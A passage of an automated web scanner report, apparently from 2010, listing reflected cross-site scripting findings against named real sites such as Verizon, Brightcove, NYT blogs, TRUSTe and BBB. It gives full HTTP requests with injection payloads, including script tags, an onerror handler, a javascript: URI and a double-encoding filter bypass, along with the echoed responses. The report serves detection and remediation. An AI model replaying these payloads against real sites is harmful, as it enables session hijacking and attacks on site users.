Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 100
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:14 GMT
Connection: close
Set-Cookie: SaasSessionID=cNVGMnKp89RdNbdLXk4PvGZtSn1NrhpJcJWQG7Q3Q0MKqvVnQjTD!-1644393018; path=/

Resource /SMBPortal/smb67735(a)9f20f4c39e9/portletInstance_11 could not be resolved for locale null.

2.335. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c40e9(a)02478217481 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11c40e9(a)02478217481 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 100
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:14 GMT
Connection: close
Set-Cookie: SaasSessionID=QfhTMnKpgV3mRyQ1Q3vTwwnG1GRQnV7fLLqQQRygJR12YFyhWV01!-1644393018; path=/

Resource /SMBPortal/smb/portletInstance_11c40e9(a)02478217481 could not be resolved for locale null.

2.336. http://c.brightcove.com/services/messagebroker/amf [2nd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload f38fd<script>alert(1)</script>10c09d7f424 was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerId=43942763001 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://admin.brightcove.com/viewer/us1.24.03.03.2010-11-17124414/federatedVideoUI/BrightcovePlayer.swf
x-flash-version: 10,1,102,64
Content-Type: application/x-amf
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: c.brightcove.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 326

.......Mcom.brightcove.experience.ExperienceRuntimeFacade.getProgrammingWithOverrides../1.....    ...Q94aaf807a268f7c2287a8e8b63f3a2dbf8e9de04.B$vb....    ..
..Scom.brightcove.experience.ContentOverride.fea
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 174.122.23.218
X-BC-Connecting-IP: 174.122.23.218
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Fri, 19 Nov 2010 23:46:40 GMT
Server:
Content-Length: 36152

......../1/onResult.......    .evideoListf38fd<script>alert(1)</script>10c09d7f424
skcom.brightcove.player.programming.ProgrammedLineupDTO.id.componentRefId.playerId%mediaCollectionDTO    type.lineupId.version....
..Ucom.brightcove.catalog.trimmed.PlaylistDTO.mediaIds.videoDTOs.videoId
...[SNIP]...

2.337. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload b5cf7<script>alert(1)</script>9c590c2707d was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerId=10032373001 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://admin.brightcove.com/viewer/us1.24.03.03.2010-11-17124414/federatedVideo/BrightcovePlayer.swf
x-flash-version: 10,1,102,64
Content-Type: application/x-amf
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: c.brightcove.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 473

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Qe30f0fdb82041db243fa3c538e190feb62a1e2f2
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 174.122.23.218
X-BC-Connecting-IP: 174.122.23.218
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Fri, 19 Nov 2010 23:46:37 GMT
Server:
Content-Length: 5466

......../1/onResult.....A.
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
..x.....eAQ~~,AAAAAGAh48g~,rtgnGLxq6sawJP7KZsdRG7TBjMJv4bvB.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bc.... ....ivideoPlayerb5cf7<script>alert(1)</script>9c590c2707d.........
.SOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

2.338. http://cityroom.blogs.nytimes.com/2010/11/19/casting-spells-at-columbus-circle/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cityroom.blogs.nytimes.com
Path:   /2010/11/19/casting-spells-at-columbus-circle/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30edd"><script>alert(1)</script>622313c2833 was submitted in the src parameter. This input was echoed as 30edd\"><script>alert(1)</script>622313c2833 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/casting-spells-at-columbus-circle/?src=twr30edd"><script>alert(1)</script>622313c2833 HTTP/1.1
Host: cityroom.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:16:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://cityroom.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ation;Bloomberg+administration;Albany;subway;Ground+Zero;9/11;transportation;Central+Park;NYPD;NYC;CityRoom;columbus-circle;cultural-affairs;harry-potter;offbeat;people-neighborhoods;_top_story&src=twr30edd\"><script>alert(1)</script>622313c2833">
...[SNIP]...

2.339. http://cityroom.blogs.nytimes.com/2010/11/19/driver-of-school-bus-arrested-after-accusations-of-sex-abuse/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cityroom.blogs.nytimes.com
Path:   /2010/11/19/driver-of-school-bus-arrested-after-accusations-of-sex-abuse/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a91c7"><script>alert(1)</script>591335caee9 was submitted in the src parameter. This input was echoed as a91c7\"><script>alert(1)</script>591335caee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/driver-of-school-bus-arrested-after-accusations-of-sex-abuse/?src=twra91c7"><script>alert(1)</script>591335caee9 HTTP/1.1
Host: cityroom.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:16:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://cityroom.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
tzer+administration;Bloomberg+administration;Albany;subway;Ground+Zero;9/11;transportation;Central+Park;NYPD;NYC;CityRoom;corona;crime-public-safety;police-and-fire;schools;sex-abuse;_top_story&src=twra91c7\"><script>alert(1)</script>591335caee9">
...[SNIP]...

2.340. http://cityroom.blogs.nytimes.com/2010/11/19/the-week-in-pictures-for-nov-19/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cityroom.blogs.nytimes.com
Path:   /2010/11/19/the-week-in-pictures-for-nov-19/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4101"><script>alert(1)</script>570aa5a217 was submitted in the src parameter. This input was echoed as a4101\"><script>alert(1)</script>570aa5a217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/the-week-in-pictures-for-nov-19/?src=twra4101"><script>alert(1)</script>570aa5a217 HTTP/1.1
Host: cityroom.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:16:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://cityroom.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ell+Chan;borough;Spitzer+administration;Bloomberg+administration;Albany;subway;Ground+Zero;9/11;transportation;Central+Park;NYPD;NYC;CityRoom;photographs;photography;week-in-pictures;_top_story&src=twra4101\"><script>alert(1)</script>570aa5a217">
...[SNIP]...

2.341. http://claimid.com/username [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://claimid.com
Path:   /username

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15cd9"><img%20src%3da%20onerror%3dalert(1)>15641d0c0bf was submitted in the REST URL parameter 1. This input was echoed as 15cd9"><img src=a onerror=alert(1)>15641d0c0bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /username15cd9"><img%20src%3da%20onerror%3dalert(1)>15641d0c0bf HTTP/1.1
Host: claimid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:16:57 GMT
Server: Mongrel 1.1.4
Served-By: Joyent
Status: 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2950
Set-Cookie: _ruby_claimid=6549405f6efec5ac9e69d347cc539eec; path=/; expires=Sun, 19 Dec 2010 21:04:54 GMT
Via: 1.1 claimid.com
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<meta http-equiv="x-xrds-location" content="http://openid.claimid.com/username15cd9"><img src=a onerror=alert(1)>15641d0c0bf/xrds" />
...[SNIP]...

2.342. http://clicktoverify.truste.com/pvr.php [sealid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b4e9b%20style%3dx%3aexpression(alert(1))%20ea7e8e00151 was submitted in the sealid parameter. This input was echoed as b4e9b style=x:expression(alert(1)) ea7e8e00151 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.verizon.com&sealid=101b4e9b%20style%3dx%3aexpression(alert(1))%20ea7e8e00151 HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:17:10 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10799


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification b
...[SNIP]...
<input type='hidden' name='sealid' value=101b4e9b style=x:expression(alert(1)) ea7e8e00151>
...[SNIP]...

2.343. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cms.bbb.org
Path:   /wwwroot/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc398%253cscript%253ealert%25281%2529%253c%252fscript%253e4bedb239051 was submitted in the REST URL parameter 1. This input was echoed as fc398<script>alert(1)</script>4bedb239051 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /wwwrootfc398%253cscript%253ealert%25281%2529%253c%252fscript%253e4bedb239051/js/global.js HTTP/1.1
Host: cms.bbb.org
Proxy-Connection: keep-alive
Referer: http://www.bbb.org/new-york-city/business-reviews/telephone-companies/verizon-communications-in-new-york-ny-411/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 20 Nov 2010 04:17:50 GMT
Connection: keep-alive
Set-Cookie: BBB_Cookie=2510494380.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 20723


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="headTag"><title>
   News Center -
...[SNIP]...
<div class="news-results">0 Related Articles for 404;http://cms.bbb.org:80/wwwrootfc398<script>alert(1)</script>4bedb239051/js/global.js</div>
...[SNIP]...

2.344. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cms.bbb.org
Path:   /wwwroot/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d268%253cscript%253ealert%25281%2529%253c%252fscript%253ebc5f4e019fe was submitted in the REST URL parameter 2. This input was echoed as 5d268<script>alert(1)</script>bc5f4e019fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /wwwroot/js5d268%253cscript%253ealert%25281%2529%253c%252fscript%253ebc5f4e019fe/global.js HTTP/1.1
Host: cms.bbb.org
Proxy-Connection: keep-alive
Referer: http://www.bbb.org/new-york-city/business-reviews/telephone-companies/verizon-communications-in-new-york-ny-411/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 20 Nov 2010 04:17:52 GMT
Connection: keep-alive
Set-Cookie: BBB_Cookie=2510363308.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 20723


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="headTag"><title>
   News Center -
...[SNIP]...
<div class="news-results">0 Related Articles for 404;http://cms.bbb.org:80/wwwroot/js5d268<script>alert(1)</script>bc5f4e019fe/global.js</div>
...[SNIP]...

2.345. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cms.bbb.org
Path:   /wwwroot/js/global.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 529f3%253cscript%253ealert%25281%2529%253c%252fscript%253e2e30b97d6d1 was submitted in the REST URL parameter 3. This input was echoed as 529f3<script>alert(1)</script>2e30b97d6d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /wwwroot/js/global.js529f3%253cscript%253ealert%25281%2529%253c%252fscript%253e2e30b97d6d1 HTTP/1.1
Host: cms.bbb.org
Proxy-Connection: keep-alive
Referer: http://www.bbb.org/new-york-city/business-reviews/telephone-companies/verizon-communications-in-new-york-ny-411/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 20 Nov 2010 04:17:54 GMT
Connection: keep-alive
Set-Cookie: BBB_Cookie=2510428844.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 20723


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="headTag"><title>
   News Center -
...[SNIP]...
<div class="news-results">0 Related Articles for 404;http://cms.bbb.org:80/wwwroot/js/global.js529f3<script>alert(1)</script>2e30b97d6d1</div>
...[SNIP]...

2.346. http://community.thinkfinity.org/community/professionaldevelopment [frame parameter]  previous  next

Summary


Severity:   High
Confidence:   Certain
Host:   http://community.thinkfinity.org
Path:   /community/professionaldevelopment

Issue detail

The value of the frame request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//7fe72404 was submitted in the frame parameter. This input was echoed as javascript:alert(1)//7fe72404 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/professionaldevelopment?view=iframe&frame=javascript%3aalert(1)//7fe72404 HTTP/1.1
Host: community.thinkfinity.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:17:49 GMT
Server: Apache-Coyote/1.1
X-JAL: 21
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.server.info="serverName=community.thinkfinity.org:serverPort=80:contextPath=:localName=verizon-foundation-vm-wa01.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; Version=1; Path=/
Set-Cookie: JSESSIONID=BDBB089BD36DD09A96ADEC3233C5594D.; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323030333b; Expires=Mon, 20-Dec-2010 04:17:50 GMT; Path=/
Vary: User-Agent
X-JSL: D=33135 t=1290226669998301
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Set-Cookie: BIGipServerPool_VM161=522287114.20480.0000; path=/
Content-Length: 115362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<iframe src="javascript:alert(1)//7fe72404"
height="875px}"
width="970px}"
scrolling="yes}">
...[SNIP]...

2.347. http://content.usatoday.net/dist/custom/gci/InsidePage.aspx [cId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.net
Path:   /dist/custom/gci/InsidePage.aspx

Issue detail

The value of the cId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81b2"><script>alert(1)</script>9928876c277 was submitted in the cId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dist/custom/gci/InsidePage.aspx?cId=thedailyjournale81b2"><script>alert(1)</script>9928876c277&sParam=34219553.story HTTP/1.1
Host: content.usatoday.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=300
Date: Sat, 20 Nov 2010 04:19:25 GMT
Content-Length: 5433
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><meta
...[SNIP]...
<script src="http://thedailyjournale81b2"><script>alert(1)</script>9928876c277.gannettonline.com/usatravel-localvar.js">
...[SNIP]...

2.348. http://dealbook.nytimes.com/2010/11/19/as-tech-deals-boom-talk-turns-to-bubbles/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2010/11/19/as-tech-deals-boom-talk-turns-to-bubbles/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e89e"><script>alert(1)</script>6b689c12e33 was submitted in the src parameter. This input was echoed as 4e89e\"><script>alert(1)</script>6b689c12e33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/as-tech-deals-boom-talk-turns-to-bubbles/?src=twr4e89e"><script>alert(1)</script>6b689c12e33 HTTP/1.1
Host: dealbook.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:20:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
roup;bubbles;frank-p-quattrone;fred-wilson;john-doerr;kleiner-perkins-caufield-byers;mary-meeker;morgan-stanley;qatalyst-partners;technology;top-headline-2;union-square-ventures;venture-capital&src=twr4e89e\"><script>alert(1)</script>6b689c12e33">
...[SNIP]...

